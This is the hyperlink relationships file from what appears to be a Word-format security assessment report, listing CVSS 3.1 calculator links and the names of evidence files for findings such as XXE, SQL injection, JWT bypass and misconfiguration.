<file path=word/_rels/footnotes.xml.rels><?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId120" Target="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId97" Target="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId39" Target="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId55" Target="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId58" Target="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId65" Target="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId33" Target="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId27" Target="https://www.first.org/cvss/v3.1/specification-document" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId138" Target="images/finding-2062c814-6db2-4bcc-8eea-c8873e384f4e-21-xxe-passwd-response.html" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId139" Target="images/finding-2062c814-6db2-4bcc-8eea-c8873e384f4e-22-xxe_test.xml" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId62" Target="images/finding-339a38ee-5c38-40f3-8acf-32b01f2e5a5e-4-misconfig-exposed-config.json" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId40" Target="images/finding-37aa42e5-35f3-4c2f-9ae8-05b4bdfa096a-1-sqli-baseline-apple.json" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId51" Target="images/finding-37aa42e5-35f3-4c2f-9ae8-05b4bdfa096a-15-sqli-extracted-credentials.txt" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId52" Target="images/finding-37aa42e5-35f3-4c2f-9ae8-05b4bdfa096a-17-sqli-test-summary.txt" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId41" Target="images/finding-37aa42e5-35f3-4c2f-9ae8-05b4bdfa096a-2-sqli-baseline-apple.json" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId78" Target="images/finding-3fdd0e16-0e1c-44a1-bd08-f50a108aad5b-9-misconfig-acquisitions-content.md" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId86" Target="images/finding-96393f3c-3173-4c3b-929f-9c7e85326a81-10-jwt-none-algorithm-bypass-20260227-004.json" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId128" Target="images/finding-d02ca450-53b7-4634-92e4-6db8468e9436-18-business-logic-race-condition-checkout.json" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId69" Target="images/finding-f1d5a2c5-eea8-4320-9642-c41e1bcf2c72-6-misconfig-stack-trac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2026-02-27T14:09:37Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-27T14:09:37Z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